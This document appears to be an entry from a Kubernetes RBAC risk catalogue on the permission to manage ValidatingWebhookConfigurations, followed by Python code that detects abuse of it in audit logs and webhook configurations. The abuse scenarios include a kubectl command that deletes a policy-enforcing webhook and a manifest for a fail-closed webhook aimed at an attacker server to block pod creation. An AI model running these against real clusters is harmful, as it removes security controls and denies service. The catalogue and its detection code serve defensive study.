Overview

Field                    Value
ID                       1044
Name                     Manage ValidatingWebhookConfigurations
Risk Category            Tampering
Risk Level               Critical
Role Type                ClusterRole
API Groups               admissionregistration.k8s.io
Resources                validatingwebhookconfigurations
Risky Verb Combinations  [create] · [update] · [patch] · [delete]
Tags                     DenialOfService, Tampering, WebhookManipulation

Description

Allows control over ValidatingWebhookConfigurations, the objects that tell the API server which webhooks validate or reject API objects during admission. A subject holding these verbs can tamper with security policy (for example, delete a validating webhook that enforces security best practices, so that non-compliant objects are admitted) or cause denial of service by registering a fail-closed webhook that rejects legitimate requests.

Abuse Scenarios

  1. Delete a ValidatingWebhookConfiguration that enforces security policies.

     kubectl delete validatingwebhookconfiguration <webhook-name>
     # Example: kubectl delete validatingwebhookconfiguration pod-security-policy-webhook

  2. Create a ValidatingWebhookConfiguration to block legitimate resource creation (DoS).

     kubectl create -f - <<EOF
     apiVersion: admissionregistration.k8s.io/v1
     kind: ValidatingWebhookConfiguration
     metadata:
       name: deny-all-pods
     webhooks:
     - name: deny-all-pods.example.com
       clientConfig:
         url: "https://<malicious-webhook-server>/validate" # Attacker-controlled server that always denies
         caBundle: <base64-encoded-ca-cert>
       rules:
       - operations: ["CREATE"]
         apiGroups: [""]
         apiVersions: ["v1"]
         resources: ["pods"]
       admissionReviewVersions: ["v1", "v1beta1"]
       sideEffects: None
       failurePolicy: Fail # Crucial for DoS: the API server denies every matching request when the webhook rejects or is unreachable
     EOF
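The two checks a defender would want for this entry, as an added example that is not part of the original catalogue page: a scan of Kubernetes audit events for write verbs against validatingwebhookconfigurations (covers scenario 1 and the creation step of scenario 2), and an inspection of a ValidatingWebhookConfiguration object for a fail-closed webhook that points at an endpoint outside the cluster and matches CREATE requests (covers the DoS configuration in scenario 2). The audit events, the configuration object, the usernames and the hostname `webhook.example.invalid` are all constructed for this example; the event field names follow the audit.k8s.io/v1 Event schema.

```python
"""Detection helpers for ValidatingWebhookConfiguration tampering (added example).

The sample audit events and the sample configuration below are constructed for
this example; they are not taken from a real cluster.
"""
from typing import Any

WRITE_VERBS = {"create", "update", "patch", "delete"}
WEBHOOK_RESOURCE = "validatingwebhookconfigurations"
WEBHOOK_GROUP = "admissionregistration.k8s.io"


def risky_webhook_writes(events: list[dict[str, Any]]) -> list[dict[str, Any]]:
    """Return one finding per audit event that mutates a ValidatingWebhookConfiguration.

    Only the ResponseComplete stage is considered, so each request is reported once,
    together with its HTTP status (a denied attempt is still worth seeing).
    """
    findings = []
    for ev in events:
        ref = ev.get("objectRef") or {}
        if ev.get("stage") != "ResponseComplete":
            continue
        if ev.get("verb") not in WRITE_VERBS:
            continue
        if ref.get("resource") != WEBHOOK_RESOURCE or ref.get("apiGroup") != WEBHOOK_GROUP:
            continue
        findings.append({
            "user": (ev.get("user") or {}).get("username", "<unknown>"),
            "verb": ev["verb"],
            "name": ref.get("name", "<all>"),  # a deletecollection request carries no name
            "status": (ev.get("responseStatus") or {}).get("code"),
        })
    return findings


def fail_closed_external_webhooks(cfg: dict[str, Any]) -> list[str]:
    """Return the names of webhooks in cfg that can deny admission for matching requests.

    A webhook is flagged when it is fail-closed (failurePolicy: Fail, which is also
    the v1 default when the field is omitted), its clientConfig uses a URL rather
    than an in-cluster Service, and at least one rule covers CREATE. Such a webhook
    denies every matching request whenever the external endpoint rejects or is down.
    """
    flagged = []
    for wh in cfg.get("webhooks", []):
        client = wh.get("clientConfig", {})
        if "url" not in client:
            continue  # in-cluster Service reference; reviewed separately
        if wh.get("failurePolicy", "Fail") != "Fail":
            continue
        for rule in wh.get("rules", []):
            ops = rule.get("operations", [])
            if "CREATE" in ops or "*" in ops:
                flagged.append(wh["name"])
                break
    return flagged


# Constructed audit events (audit.k8s.io/v1 Event layout, Metadata level).
SAMPLE_AUDIT_EVENTS = [
    {"stage": "ResponseComplete", "verb": "get",
     "user": {"username": "system:kube-controller-manager"},
     "objectRef": {"resource": WEBHOOK_RESOURCE, "apiGroup": WEBHOOK_GROUP,
                   "name": "pod-security-policy-webhook"},
     "responseStatus": {"code": 200}},
    {"stage": "ResponseComplete", "verb": "delete",
     "user": {"username": "dev-ci-bot"},
     "objectRef": {"resource": WEBHOOK_RESOURCE, "apiGroup": WEBHOOK_GROUP,
                   "name": "pod-security-policy-webhook"},
     "responseStatus": {"code": 200}},
    {"stage": "ResponseComplete", "verb": "create",
     "user": {"username": "dev-ci-bot"},
     "objectRef": {"resource": WEBHOOK_RESOURCE, "apiGroup": WEBHOOK_GROUP,
                   "name": "deny-all-pods"},
     "responseStatus": {"code": 201}},
    {"stage": "ResponseComplete", "verb": "patch",
     "user": {"username": "alice"},
     "objectRef": {"resource": "configmaps", "apiGroup": "", "name": "app-config"},
     "responseStatus": {"code": 200}},
]

# Constructed ValidatingWebhookConfiguration with one risky and one benign webhook.
SAMPLE_WEBHOOK_CONFIG = {
    "apiVersion": "admissionregistration.k8s.io/v1",
    "kind": "ValidatingWebhookConfiguration",
    "metadata": {"name": "deny-all-pods"},
    "webhooks": [
        {"name": "deny-all-pods.example.com",
         "clientConfig": {"url": "https://webhook.example.invalid/validate"},
         "rules": [{"operations": ["CREATE"], "apiGroups": [""],
                    "apiVersions": ["v1"], "resources": ["pods"]}],
         "failurePolicy": "Fail"},
        {"name": "audit-only.example.com",
         "clientConfig": {"service": {"namespace": "policy", "name": "validator"}},
         "rules": [{"operations": ["CREATE", "UPDATE"], "apiGroups": ["apps"],
                    "apiVersions": ["v1"], "resources": ["deployments"]}],
         "failurePolicy": "Ignore"},
    ],
}

if __name__ == "__main__":
    for f in risky_webhook_writes(SAMPLE_AUDIT_EVENTS):
        print(f"webhook write: user={f['user']} verb={f['verb']} "
              f"name={f['name']} status={f['status']}")
    print("fail-closed external webhooks:",
          fail_closed_external_webhooks(SAMPLE_WEBHOOK_CONFIG))
```

Run against the constructed input, the audit scan reports the `delete` of `pod-security-policy-webhook` and the `create` of `deny-all-pods`, both by `dev-ci-bot`, and ignores the read by the controller manager and the unrelated ConfigMap patch; the configuration check flags only `deny-all-pods.example.com`. In a real deployment the same two functions would be fed from the API server audit log sink and from `kubectl get validatingwebhookconfigurations -o json`, and the write findings are the events to alert on for any subject that is not an approved policy-management identity.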